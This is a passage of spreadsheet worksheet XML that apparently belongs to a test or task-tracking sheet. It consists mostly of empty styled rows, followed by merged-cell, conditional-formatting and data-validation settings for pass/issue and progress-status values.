      <c r="D733" s="19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customHeight="1">
      <c r="A734" s="19"/>
      <c r="B734" s="20"/>
      <c r="C734" s="21"/>
      <c r="D734" s="19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customHeight="1">
      <c r="A735" s="19"/>
      <c r="B735" s="20"/>
      <c r="C735" s="21"/>
      <c r="D735" s="19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customHeight="1">
      <c r="A736" s="19"/>
      <c r="B736" s="20"/>
      <c r="C736" s="21"/>
      <c r="D736" s="19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customHeight="1">
      <c r="A737" s="19"/>
      <c r="B737" s="20"/>
      <c r="C737" s="21"/>
      <c r="D737" s="19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customHeight="1">
      <c r="A738" s="19"/>
      <c r="B738" s="20"/>
      <c r="C738" s="21"/>
      <c r="D738" s="19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customHeight="1">
      <c r="A739" s="19"/>
      <c r="B739" s="20"/>
      <c r="C739" s="21"/>
      <c r="D739" s="19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customHeight="1">
      <c r="A740" s="19"/>
      <c r="B740" s="20"/>
      <c r="C740" s="21"/>
      <c r="D740" s="19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customHeight="1">
      <c r="A741" s="19"/>
      <c r="B741" s="20"/>
      <c r="C741" s="21"/>
      <c r="D741" s="19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customHeight="1">
      <c r="A742" s="19"/>
      <c r="B742" s="20"/>
      <c r="C742" s="21"/>
      <c r="D742" s="19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customHeight="1">
      <c r="A743" s="19"/>
      <c r="B743" s="20"/>
      <c r="C743" s="21"/>
      <c r="D743" s="19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customHeight="1">
      <c r="A744" s="19"/>
      <c r="B744" s="20"/>
      <c r="C744" s="21"/>
      <c r="D744" s="19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customHeight="1">
      <c r="A745" s="19"/>
      <c r="B745" s="20"/>
      <c r="C745" s="21"/>
      <c r="D745" s="19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customHeight="1">
      <c r="A746" s="19"/>
      <c r="B746" s="20"/>
      <c r="C746" s="21"/>
      <c r="D746" s="19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customHeight="1">
      <c r="A747" s="19"/>
      <c r="B747" s="20"/>
      <c r="C747" s="21"/>
      <c r="D747" s="19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customHeight="1">
      <c r="A748" s="19"/>
      <c r="B748" s="20"/>
      <c r="C748" s="21"/>
      <c r="D748" s="19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customHeight="1">
      <c r="A749" s="19"/>
      <c r="B749" s="20"/>
      <c r="C749" s="21"/>
      <c r="D749" s="19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customHeight="1">
      <c r="A750" s="19"/>
      <c r="B750" s="20"/>
      <c r="C750" s="21"/>
      <c r="D750" s="19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customHeight="1">
      <c r="A751" s="19"/>
      <c r="B751" s="20"/>
      <c r="C751" s="21"/>
      <c r="D751" s="19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customHeight="1">
      <c r="A752" s="19"/>
      <c r="B752" s="20"/>
      <c r="C752" s="21"/>
      <c r="D752" s="19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customHeight="1">
      <c r="A753" s="19"/>
      <c r="B753" s="20"/>
      <c r="C753" s="21"/>
      <c r="D753" s="19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customHeight="1">
      <c r="A754" s="19"/>
      <c r="B754" s="20"/>
      <c r="C754" s="21"/>
      <c r="D754" s="19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customHeight="1">
      <c r="A755" s="19"/>
      <c r="B755" s="20"/>
      <c r="C755" s="21"/>
      <c r="D755" s="19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customHeight="1">
      <c r="A756" s="19"/>
      <c r="B756" s="20"/>
      <c r="C756" s="21"/>
      <c r="D756" s="19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customHeight="1">
      <c r="A757" s="19"/>
      <c r="B757" s="20"/>
      <c r="C757" s="21"/>
      <c r="D757" s="19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customHeight="1">
      <c r="A758" s="19"/>
      <c r="B758" s="20"/>
      <c r="C758" s="21"/>
      <c r="D758" s="19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customHeight="1">
      <c r="A759" s="19"/>
      <c r="B759" s="20"/>
      <c r="C759" s="21"/>
      <c r="D759" s="19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customHeight="1">
      <c r="A760" s="19"/>
      <c r="B760" s="20"/>
      <c r="C760" s="21"/>
      <c r="D760" s="19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customHeight="1">
      <c r="A761" s="19"/>
      <c r="B761" s="20"/>
      <c r="C761" s="21"/>
      <c r="D761" s="19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customHeight="1">
      <c r="A762" s="19"/>
      <c r="B762" s="20"/>
      <c r="C762" s="21"/>
      <c r="D762" s="19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customHeight="1">
      <c r="A763" s="19"/>
      <c r="B763" s="20"/>
      <c r="C763" s="21"/>
      <c r="D763" s="19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customHeight="1">
      <c r="A764" s="19"/>
      <c r="B764" s="20"/>
      <c r="C764" s="21"/>
      <c r="D764" s="19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customHeight="1">
      <c r="A765" s="19"/>
      <c r="B765" s="20"/>
      <c r="C765" s="21"/>
      <c r="D765" s="19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customHeight="1">
      <c r="A766" s="19"/>
      <c r="B766" s="20"/>
      <c r="C766" s="21"/>
      <c r="D766" s="19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customHeight="1">
      <c r="A767" s="19"/>
      <c r="B767" s="20"/>
      <c r="C767" s="21"/>
      <c r="D767" s="19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customHeight="1">
      <c r="A768" s="19"/>
      <c r="B768" s="20"/>
      <c r="C768" s="21"/>
      <c r="D768" s="19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customHeight="1">
      <c r="A769" s="19"/>
      <c r="B769" s="20"/>
      <c r="C769" s="21"/>
      <c r="D769" s="19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customHeight="1">
      <c r="A770" s="19"/>
      <c r="B770" s="20"/>
      <c r="C770" s="21"/>
      <c r="D770" s="19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customHeight="1">
      <c r="A771" s="19"/>
      <c r="B771" s="20"/>
      <c r="C771" s="21"/>
      <c r="D771" s="19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customHeight="1">
      <c r="A772" s="19"/>
      <c r="B772" s="20"/>
      <c r="C772" s="21"/>
      <c r="D772" s="19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customHeight="1">
      <c r="A773" s="19"/>
      <c r="B773" s="20"/>
      <c r="C773" s="21"/>
      <c r="D773" s="19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customHeight="1">
      <c r="A774" s="19"/>
      <c r="B774" s="20"/>
      <c r="C774" s="21"/>
      <c r="D774" s="19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customHeight="1">
      <c r="A775" s="19"/>
      <c r="B775" s="20"/>
      <c r="C775" s="21"/>
      <c r="D775" s="19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customHeight="1">
      <c r="A776" s="19"/>
      <c r="B776" s="20"/>
      <c r="C776" s="21"/>
      <c r="D776" s="19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customHeight="1">
      <c r="A777" s="19"/>
      <c r="B777" s="20"/>
      <c r="C777" s="21"/>
      <c r="D777" s="19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customHeight="1">
      <c r="A778" s="19"/>
      <c r="B778" s="20"/>
      <c r="C778" s="21"/>
      <c r="D778" s="19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customHeight="1">
      <c r="A779" s="19"/>
      <c r="B779" s="20"/>
      <c r="C779" s="21"/>
      <c r="D779" s="19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customHeight="1">
      <c r="A780" s="19"/>
      <c r="B780" s="20"/>
      <c r="C780" s="21"/>
      <c r="D780" s="19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customHeight="1">
      <c r="A781" s="19"/>
      <c r="B781" s="20"/>
      <c r="C781" s="21"/>
      <c r="D781" s="19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customHeight="1">
      <c r="A782" s="19"/>
      <c r="B782" s="20"/>
      <c r="C782" s="21"/>
      <c r="D782" s="19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customHeight="1">
      <c r="A783" s="19"/>
      <c r="B783" s="20"/>
      <c r="C783" s="21"/>
      <c r="D783" s="19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customHeight="1">
      <c r="A784" s="19"/>
      <c r="B784" s="20"/>
      <c r="C784" s="21"/>
      <c r="D784" s="19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customHeight="1">
      <c r="A785" s="19"/>
      <c r="B785" s="20"/>
      <c r="C785" s="21"/>
      <c r="D785" s="19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customHeight="1">
      <c r="A786" s="19"/>
      <c r="B786" s="20"/>
      <c r="C786" s="21"/>
      <c r="D786" s="19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customHeight="1">
      <c r="A787" s="19"/>
      <c r="B787" s="20"/>
      <c r="C787" s="21"/>
      <c r="D787" s="19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customHeight="1">
      <c r="A788" s="19"/>
      <c r="B788" s="20"/>
      <c r="C788" s="21"/>
      <c r="D788" s="19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customHeight="1">
      <c r="A789" s="19"/>
      <c r="B789" s="20"/>
      <c r="C789" s="21"/>
      <c r="D789" s="19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customHeight="1">
      <c r="A790" s="19"/>
      <c r="B790" s="20"/>
      <c r="C790" s="21"/>
      <c r="D790" s="19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customHeight="1">
      <c r="A791" s="19"/>
      <c r="B791" s="20"/>
      <c r="C791" s="21"/>
      <c r="D791" s="19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customHeight="1">
      <c r="A792" s="19"/>
      <c r="B792" s="20"/>
      <c r="C792" s="21"/>
      <c r="D792" s="19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customHeight="1">
      <c r="A793" s="19"/>
      <c r="B793" s="20"/>
      <c r="C793" s="21"/>
      <c r="D793" s="19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customHeight="1">
      <c r="A794" s="19"/>
      <c r="B794" s="20"/>
      <c r="C794" s="21"/>
      <c r="D794" s="19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customHeight="1">
      <c r="A795" s="19"/>
      <c r="B795" s="20"/>
      <c r="C795" s="21"/>
      <c r="D795" s="19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customHeight="1">
      <c r="A796" s="19"/>
      <c r="B796" s="20"/>
      <c r="C796" s="21"/>
      <c r="D796" s="19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customHeight="1">
      <c r="A797" s="19"/>
      <c r="B797" s="20"/>
      <c r="C797" s="21"/>
      <c r="D797" s="19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customHeight="1">
      <c r="A798" s="19"/>
      <c r="B798" s="20"/>
      <c r="C798" s="21"/>
      <c r="D798" s="19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customHeight="1">
      <c r="A799" s="19"/>
      <c r="B799" s="20"/>
      <c r="C799" s="21"/>
      <c r="D799" s="19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customHeight="1">
      <c r="A800" s="19"/>
      <c r="B800" s="20"/>
      <c r="C800" s="21"/>
      <c r="D800" s="19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customHeight="1">
      <c r="A801" s="19"/>
      <c r="B801" s="20"/>
      <c r="C801" s="21"/>
      <c r="D801" s="19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customHeight="1">
      <c r="A802" s="19"/>
      <c r="B802" s="20"/>
      <c r="C802" s="21"/>
      <c r="D802" s="19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customHeight="1">
      <c r="A803" s="19"/>
      <c r="B803" s="20"/>
      <c r="C803" s="21"/>
      <c r="D803" s="19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customHeight="1">
      <c r="A804" s="19"/>
      <c r="B804" s="20"/>
      <c r="C804" s="21"/>
      <c r="D804" s="19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customHeight="1">
      <c r="A805" s="19"/>
      <c r="B805" s="20"/>
      <c r="C805" s="21"/>
      <c r="D805" s="19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customHeight="1">
      <c r="A806" s="19"/>
      <c r="B806" s="20"/>
      <c r="C806" s="21"/>
      <c r="D806" s="19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customHeight="1">
      <c r="A807" s="19"/>
      <c r="B807" s="20"/>
      <c r="C807" s="21"/>
      <c r="D807" s="19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customHeight="1">
      <c r="A808" s="19"/>
      <c r="B808" s="20"/>
      <c r="C808" s="21"/>
      <c r="D808" s="19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customHeight="1">
      <c r="A809" s="19"/>
      <c r="B809" s="20"/>
      <c r="C809" s="21"/>
      <c r="D809" s="19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customHeight="1">
      <c r="A810" s="19"/>
      <c r="B810" s="20"/>
      <c r="C810" s="21"/>
      <c r="D810" s="19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customHeight="1">
      <c r="A811" s="19"/>
      <c r="B811" s="20"/>
      <c r="C811" s="21"/>
      <c r="D811" s="19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customHeight="1">
      <c r="A812" s="19"/>
      <c r="B812" s="20"/>
      <c r="C812" s="21"/>
      <c r="D812" s="19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customHeight="1">
      <c r="A813" s="19"/>
      <c r="B813" s="20"/>
      <c r="C813" s="21"/>
      <c r="D813" s="19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customHeight="1">
      <c r="A814" s="19"/>
      <c r="B814" s="20"/>
      <c r="C814" s="21"/>
      <c r="D814" s="19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customHeight="1">
      <c r="A815" s="19"/>
      <c r="B815" s="20"/>
      <c r="C815" s="21"/>
      <c r="D815" s="19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customHeight="1">
      <c r="A816" s="19"/>
      <c r="B816" s="20"/>
      <c r="C816" s="21"/>
      <c r="D816" s="19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customHeight="1">
      <c r="A817" s="19"/>
      <c r="B817" s="20"/>
      <c r="C817" s="21"/>
      <c r="D817" s="19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customHeight="1">
      <c r="A818" s="19"/>
      <c r="B818" s="20"/>
      <c r="C818" s="21"/>
      <c r="D818" s="19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customHeight="1">
      <c r="A819" s="19"/>
      <c r="B819" s="20"/>
      <c r="C819" s="21"/>
      <c r="D819" s="19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customHeight="1">
      <c r="A820" s="19"/>
      <c r="B820" s="20"/>
      <c r="C820" s="21"/>
      <c r="D820" s="19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customHeight="1">
      <c r="A821" s="19"/>
      <c r="B821" s="20"/>
      <c r="C821" s="21"/>
      <c r="D821" s="19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customHeight="1">
      <c r="A822" s="19"/>
      <c r="B822" s="20"/>
      <c r="C822" s="21"/>
      <c r="D822" s="19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customHeight="1">
      <c r="A823" s="19"/>
      <c r="B823" s="20"/>
      <c r="C823" s="21"/>
      <c r="D823" s="19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customHeight="1">
      <c r="A824" s="19"/>
      <c r="B824" s="20"/>
      <c r="C824" s="21"/>
      <c r="D824" s="19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customHeight="1">
      <c r="A825" s="19"/>
      <c r="B825" s="20"/>
      <c r="C825" s="21"/>
      <c r="D825" s="19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customHeight="1">
      <c r="A826" s="19"/>
      <c r="B826" s="20"/>
      <c r="C826" s="21"/>
      <c r="D826" s="19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customHeight="1">
      <c r="A827" s="19"/>
      <c r="B827" s="20"/>
      <c r="C827" s="21"/>
      <c r="D827" s="19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customHeight="1">
      <c r="A828" s="19"/>
      <c r="B828" s="20"/>
      <c r="C828" s="21"/>
      <c r="D828" s="19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customHeight="1">
      <c r="A829" s="19"/>
      <c r="B829" s="20"/>
      <c r="C829" s="21"/>
      <c r="D829" s="19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customHeight="1">
      <c r="A830" s="19"/>
      <c r="B830" s="20"/>
      <c r="C830" s="21"/>
      <c r="D830" s="19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customHeight="1">
      <c r="A831" s="19"/>
      <c r="B831" s="20"/>
      <c r="C831" s="21"/>
      <c r="D831" s="19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customHeight="1">
      <c r="A832" s="19"/>
      <c r="B832" s="20"/>
      <c r="C832" s="21"/>
      <c r="D832" s="19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customHeight="1">
      <c r="A833" s="19"/>
      <c r="B833" s="20"/>
      <c r="C833" s="21"/>
      <c r="D833" s="19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customHeight="1">
      <c r="A834" s="19"/>
      <c r="B834" s="20"/>
      <c r="C834" s="21"/>
      <c r="D834" s="19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customHeight="1">
      <c r="A835" s="19"/>
      <c r="B835" s="20"/>
      <c r="C835" s="21"/>
      <c r="D835" s="19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customHeight="1">
      <c r="A836" s="19"/>
      <c r="B836" s="20"/>
      <c r="C836" s="21"/>
      <c r="D836" s="19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customHeight="1">
      <c r="A837" s="19"/>
      <c r="B837" s="20"/>
      <c r="C837" s="21"/>
      <c r="D837" s="19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customHeight="1">
      <c r="A838" s="19"/>
      <c r="B838" s="20"/>
      <c r="C838" s="21"/>
      <c r="D838" s="19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customHeight="1">
      <c r="A839" s="19"/>
      <c r="B839" s="20"/>
      <c r="C839" s="21"/>
      <c r="D839" s="19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customHeight="1">
      <c r="A840" s="19"/>
      <c r="B840" s="20"/>
      <c r="C840" s="21"/>
      <c r="D840" s="19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customHeight="1">
      <c r="A841" s="19"/>
      <c r="B841" s="20"/>
      <c r="C841" s="21"/>
      <c r="D841" s="19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customHeight="1">
      <c r="A842" s="19"/>
      <c r="B842" s="20"/>
      <c r="C842" s="21"/>
      <c r="D842" s="19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customHeight="1">
      <c r="A843" s="19"/>
      <c r="B843" s="20"/>
      <c r="C843" s="21"/>
      <c r="D843" s="19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customHeight="1">
      <c r="A844" s="19"/>
      <c r="B844" s="20"/>
      <c r="C844" s="21"/>
      <c r="D844" s="19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customHeight="1">
      <c r="A845" s="19"/>
      <c r="B845" s="20"/>
      <c r="C845" s="21"/>
      <c r="D845" s="19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customHeight="1">
      <c r="A846" s="19"/>
      <c r="B846" s="20"/>
      <c r="C846" s="21"/>
      <c r="D846" s="19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customHeight="1">
      <c r="A847" s="19"/>
      <c r="B847" s="20"/>
      <c r="C847" s="21"/>
      <c r="D847" s="19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customHeight="1">
      <c r="A848" s="19"/>
      <c r="B848" s="20"/>
      <c r="C848" s="21"/>
      <c r="D848" s="19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customHeight="1">
      <c r="A849" s="19"/>
      <c r="B849" s="20"/>
      <c r="C849" s="21"/>
      <c r="D849" s="19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customHeight="1">
      <c r="A850" s="19"/>
      <c r="B850" s="20"/>
      <c r="C850" s="21"/>
      <c r="D850" s="19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customHeight="1">
      <c r="A851" s="19"/>
      <c r="B851" s="20"/>
      <c r="C851" s="21"/>
      <c r="D851" s="19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customHeight="1">
      <c r="A852" s="19"/>
      <c r="B852" s="20"/>
      <c r="C852" s="21"/>
      <c r="D852" s="19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customHeight="1">
      <c r="A853" s="19"/>
      <c r="B853" s="20"/>
      <c r="C853" s="21"/>
      <c r="D853" s="19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customHeight="1">
      <c r="A854" s="19"/>
      <c r="B854" s="20"/>
      <c r="C854" s="21"/>
      <c r="D854" s="19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customHeight="1">
      <c r="A855" s="19"/>
      <c r="B855" s="20"/>
      <c r="C855" s="21"/>
      <c r="D855" s="19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customHeight="1">
      <c r="A856" s="19"/>
      <c r="B856" s="20"/>
      <c r="C856" s="21"/>
      <c r="D856" s="19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customHeight="1">
      <c r="A857" s="19"/>
      <c r="B857" s="20"/>
      <c r="C857" s="21"/>
      <c r="D857" s="19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customHeight="1">
      <c r="A858" s="19"/>
      <c r="B858" s="20"/>
      <c r="C858" s="21"/>
      <c r="D858" s="19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customHeight="1">
      <c r="A859" s="19"/>
      <c r="B859" s="20"/>
      <c r="C859" s="21"/>
      <c r="D859" s="19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customHeight="1">
      <c r="A860" s="19"/>
      <c r="B860" s="20"/>
      <c r="C860" s="21"/>
      <c r="D860" s="19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customHeight="1">
      <c r="A861" s="19"/>
      <c r="B861" s="20"/>
      <c r="C861" s="21"/>
      <c r="D861" s="19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customHeight="1">
      <c r="A862" s="19"/>
      <c r="B862" s="20"/>
      <c r="C862" s="21"/>
      <c r="D862" s="19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customHeight="1">
      <c r="A863" s="19"/>
      <c r="B863" s="20"/>
      <c r="C863" s="21"/>
      <c r="D863" s="19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customHeight="1">
      <c r="A864" s="19"/>
      <c r="B864" s="20"/>
      <c r="C864" s="21"/>
      <c r="D864" s="19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customHeight="1">
      <c r="A865" s="19"/>
      <c r="B865" s="20"/>
      <c r="C865" s="21"/>
      <c r="D865" s="19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customHeight="1">
      <c r="A866" s="19"/>
      <c r="B866" s="20"/>
      <c r="C866" s="21"/>
      <c r="D866" s="19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customHeight="1">
      <c r="A867" s="19"/>
      <c r="B867" s="20"/>
      <c r="C867" s="21"/>
      <c r="D867" s="19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customHeight="1">
      <c r="A868" s="19"/>
      <c r="B868" s="20"/>
      <c r="C868" s="21"/>
      <c r="D868" s="19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customHeight="1">
      <c r="A869" s="19"/>
      <c r="B869" s="20"/>
      <c r="C869" s="21"/>
      <c r="D869" s="19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customHeight="1">
      <c r="A870" s="19"/>
      <c r="B870" s="20"/>
      <c r="C870" s="21"/>
      <c r="D870" s="19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customHeight="1">
      <c r="A871" s="19"/>
      <c r="B871" s="20"/>
      <c r="C871" s="21"/>
      <c r="D871" s="19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customHeight="1">
      <c r="A872" s="19"/>
      <c r="B872" s="20"/>
      <c r="C872" s="21"/>
      <c r="D872" s="19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customHeight="1">
      <c r="A873" s="19"/>
      <c r="B873" s="20"/>
      <c r="C873" s="21"/>
      <c r="D873" s="19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customHeight="1">
      <c r="A874" s="19"/>
      <c r="B874" s="20"/>
      <c r="C874" s="21"/>
      <c r="D874" s="19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customHeight="1">
      <c r="A875" s="19"/>
      <c r="B875" s="20"/>
      <c r="C875" s="21"/>
      <c r="D875" s="19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customHeight="1">
      <c r="A876" s="19"/>
      <c r="B876" s="20"/>
      <c r="C876" s="21"/>
      <c r="D876" s="19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customHeight="1">
      <c r="A877" s="19"/>
      <c r="B877" s="20"/>
      <c r="C877" s="21"/>
      <c r="D877" s="19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customHeight="1">
      <c r="A878" s="19"/>
      <c r="B878" s="20"/>
      <c r="C878" s="21"/>
      <c r="D878" s="19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customHeight="1">
      <c r="A879" s="19"/>
      <c r="B879" s="20"/>
      <c r="C879" s="21"/>
      <c r="D879" s="19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customHeight="1">
      <c r="A880" s="19"/>
      <c r="B880" s="20"/>
      <c r="C880" s="21"/>
      <c r="D880" s="19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customHeight="1">
      <c r="A881" s="19"/>
      <c r="B881" s="20"/>
      <c r="C881" s="21"/>
      <c r="D881" s="19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customHeight="1">
      <c r="A882" s="19"/>
      <c r="B882" s="20"/>
      <c r="C882" s="21"/>
      <c r="D882" s="19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customHeight="1">
      <c r="A883" s="19"/>
      <c r="B883" s="20"/>
      <c r="C883" s="21"/>
      <c r="D883" s="19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customHeight="1">
      <c r="A884" s="19"/>
      <c r="B884" s="20"/>
      <c r="C884" s="21"/>
      <c r="D884" s="19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customHeight="1">
      <c r="A885" s="19"/>
      <c r="B885" s="20"/>
      <c r="C885" s="21"/>
      <c r="D885" s="19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customHeight="1">
      <c r="A886" s="19"/>
      <c r="B886" s="20"/>
      <c r="C886" s="21"/>
      <c r="D886" s="19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customHeight="1">
      <c r="A887" s="19"/>
      <c r="B887" s="20"/>
      <c r="C887" s="21"/>
      <c r="D887" s="19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customHeight="1">
      <c r="A888" s="19"/>
      <c r="B888" s="20"/>
      <c r="C888" s="21"/>
      <c r="D888" s="19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customHeight="1">
      <c r="A889" s="19"/>
      <c r="B889" s="20"/>
      <c r="C889" s="21"/>
      <c r="D889" s="19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customHeight="1">
      <c r="A890" s="19"/>
      <c r="B890" s="20"/>
      <c r="C890" s="21"/>
      <c r="D890" s="19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customHeight="1">
      <c r="A891" s="19"/>
      <c r="B891" s="20"/>
      <c r="C891" s="21"/>
      <c r="D891" s="19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customHeight="1">
      <c r="A892" s="19"/>
      <c r="B892" s="20"/>
      <c r="C892" s="21"/>
      <c r="D892" s="19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customHeight="1">
      <c r="A893" s="19"/>
      <c r="B893" s="20"/>
      <c r="C893" s="21"/>
      <c r="D893" s="19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customHeight="1">
      <c r="A894" s="19"/>
      <c r="B894" s="20"/>
      <c r="C894" s="21"/>
      <c r="D894" s="19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customHeight="1">
      <c r="A895" s="19"/>
      <c r="B895" s="20"/>
      <c r="C895" s="21"/>
      <c r="D895" s="19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customHeight="1">
      <c r="A896" s="19"/>
      <c r="B896" s="20"/>
      <c r="C896" s="21"/>
      <c r="D896" s="19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customHeight="1">
      <c r="A897" s="19"/>
      <c r="B897" s="20"/>
      <c r="C897" s="21"/>
      <c r="D897" s="19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customHeight="1">
      <c r="A898" s="19"/>
      <c r="B898" s="20"/>
      <c r="C898" s="21"/>
      <c r="D898" s="19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customHeight="1">
      <c r="A899" s="19"/>
      <c r="B899" s="20"/>
      <c r="C899" s="21"/>
      <c r="D899" s="19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customHeight="1">
      <c r="A900" s="19"/>
      <c r="B900" s="20"/>
      <c r="C900" s="21"/>
      <c r="D900" s="19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customHeight="1">
      <c r="A901" s="19"/>
      <c r="B901" s="20"/>
      <c r="C901" s="21"/>
      <c r="D901" s="19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customHeight="1">
      <c r="A902" s="19"/>
      <c r="B902" s="20"/>
      <c r="C902" s="21"/>
      <c r="D902" s="19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customHeight="1">
      <c r="A903" s="19"/>
      <c r="B903" s="20"/>
      <c r="C903" s="21"/>
      <c r="D903" s="19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customHeight="1">
      <c r="A904" s="19"/>
      <c r="B904" s="20"/>
      <c r="C904" s="21"/>
      <c r="D904" s="19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customHeight="1">
      <c r="A905" s="19"/>
      <c r="B905" s="20"/>
      <c r="C905" s="21"/>
      <c r="D905" s="19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customHeight="1">
      <c r="A906" s="19"/>
      <c r="B906" s="20"/>
      <c r="C906" s="21"/>
      <c r="D906" s="19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customHeight="1">
      <c r="A907" s="19"/>
      <c r="B907" s="20"/>
      <c r="C907" s="21"/>
      <c r="D907" s="19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customHeight="1">
      <c r="A908" s="19"/>
      <c r="B908" s="20"/>
      <c r="C908" s="21"/>
      <c r="D908" s="19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customHeight="1">
      <c r="A909" s="19"/>
      <c r="B909" s="20"/>
      <c r="C909" s="21"/>
      <c r="D909" s="19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customHeight="1">
      <c r="A910" s="19"/>
      <c r="B910" s="20"/>
      <c r="C910" s="21"/>
      <c r="D910" s="19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customHeight="1">
      <c r="A911" s="19"/>
      <c r="B911" s="20"/>
      <c r="C911" s="21"/>
      <c r="D911" s="19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customHeight="1">
      <c r="A912" s="19"/>
      <c r="B912" s="20"/>
      <c r="C912" s="21"/>
      <c r="D912" s="19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customHeight="1">
      <c r="A913" s="19"/>
      <c r="B913" s="20"/>
      <c r="C913" s="21"/>
      <c r="D913" s="19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customHeight="1">
      <c r="A914" s="19"/>
      <c r="B914" s="20"/>
      <c r="C914" s="21"/>
      <c r="D914" s="19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customHeight="1">
      <c r="A915" s="19"/>
      <c r="B915" s="20"/>
      <c r="C915" s="21"/>
      <c r="D915" s="19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customHeight="1">
      <c r="A916" s="19"/>
      <c r="B916" s="20"/>
      <c r="C916" s="21"/>
      <c r="D916" s="19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customHeight="1">
      <c r="A917" s="19"/>
      <c r="B917" s="20"/>
      <c r="C917" s="21"/>
      <c r="D917" s="19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customHeight="1">
      <c r="A918" s="19"/>
      <c r="B918" s="20"/>
      <c r="C918" s="21"/>
      <c r="D918" s="19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customHeight="1">
      <c r="A919" s="19"/>
      <c r="B919" s="20"/>
      <c r="C919" s="21"/>
      <c r="D919" s="19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customHeight="1">
      <c r="A920" s="19"/>
      <c r="B920" s="20"/>
      <c r="C920" s="21"/>
      <c r="D920" s="19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customHeight="1">
      <c r="A921" s="19"/>
      <c r="B921" s="20"/>
      <c r="C921" s="21"/>
      <c r="D921" s="19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customHeight="1">
      <c r="A922" s="19"/>
      <c r="B922" s="20"/>
      <c r="C922" s="21"/>
      <c r="D922" s="19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customHeight="1">
      <c r="A923" s="19"/>
      <c r="B923" s="20"/>
      <c r="C923" s="21"/>
      <c r="D923" s="19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customHeight="1">
      <c r="A924" s="19"/>
      <c r="B924" s="20"/>
      <c r="C924" s="21"/>
      <c r="D924" s="19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customHeight="1">
      <c r="A925" s="19"/>
      <c r="B925" s="20"/>
      <c r="C925" s="21"/>
      <c r="D925" s="19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customHeight="1">
      <c r="A926" s="19"/>
      <c r="B926" s="20"/>
      <c r="C926" s="21"/>
      <c r="D926" s="19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customHeight="1">
      <c r="A927" s="19"/>
      <c r="B927" s="20"/>
      <c r="C927" s="21"/>
      <c r="D927" s="19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customHeight="1">
      <c r="A928" s="19"/>
      <c r="B928" s="20"/>
      <c r="C928" s="21"/>
      <c r="D928" s="19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customHeight="1">
      <c r="A929" s="19"/>
      <c r="B929" s="20"/>
      <c r="C929" s="21"/>
      <c r="D929" s="19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customHeight="1">
      <c r="A930" s="19"/>
      <c r="B930" s="20"/>
      <c r="C930" s="21"/>
      <c r="D930" s="19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customHeight="1">
      <c r="A931" s="19"/>
      <c r="B931" s="20"/>
      <c r="C931" s="21"/>
      <c r="D931" s="19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customHeight="1">
      <c r="A932" s="19"/>
      <c r="B932" s="20"/>
      <c r="C932" s="21"/>
      <c r="D932" s="19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customHeight="1">
      <c r="A933" s="19"/>
      <c r="B933" s="20"/>
      <c r="C933" s="21"/>
      <c r="D933" s="19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</sheetData>
  <autoFilter ref="A3:J5" xr:uid="{6DEC4E49-E866-DB47-BB4B-93098970F7F3}">
    <filterColumn colId="7" showButton="0"/>
  </autoFilter>
  <mergeCells count="15">
    <mergeCell ref="B9:C9"/>
    <mergeCell ref="B10:C10"/>
    <mergeCell ref="B11:C11"/>
    <mergeCell ref="B12:C12"/>
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:B4"/>
    <mergeCell ref="C3:C4"/>
    <mergeCell ref="D3:D4"/>
    <mergeCell ref="E3:E4"/>
    <mergeCell ref="F3:F4"/>
    <mergeCell ref="H3:H4"/>
    <mergeCell ref="I3:I4"/>
    <mergeCell ref="J3:J4"/>
    <mergeCell ref="G3:G4"/>
  </mergeCells>
  <conditionalFormatting sqref="H5">
    <cfRule type="cellIs" dxfId="35" priority="28" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5">
    <cfRule type="cellIs" dxfId="34" priority="29" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5">
    <cfRule type="cellIs" dxfId="33" priority="30" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9:H12 I13:J933 I1:J2 I5:J8">
    <cfRule type="containsText" dxfId="32" priority="31" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9:H12 I13:J933 I1:J2 I5:J8">
    <cfRule type="containsText" dxfId="31" priority="32" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9:H12 I13:J933 I1:J2 I5:J8">
    <cfRule type="containsText" dxfId="30" priority="33" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A10">
    <cfRule type="cellIs" dxfId="29" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A10">
    <cfRule type="cellIs" dxfId="28" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A10">
    <cfRule type="cellIs" dxfId="27" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A11">
    <cfRule type="cellIs" dxfId="26" priority="22" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A11">
    <cfRule type="cellIs" dxfId="25" priority="23" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A11">
    <cfRule type="cellIs" dxfId="24" priority="24" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A12">
    <cfRule type="cellIs" dxfId="23" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A12">
    <cfRule type="cellIs" dxfId="22" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A12">
    <cfRule type="cellIs" dxfId="21" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5" xr:uid="{C518973B-321A-1D49-A354-6DAC4F7A5C76}">
      <formula1>$A$10:$A$12</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
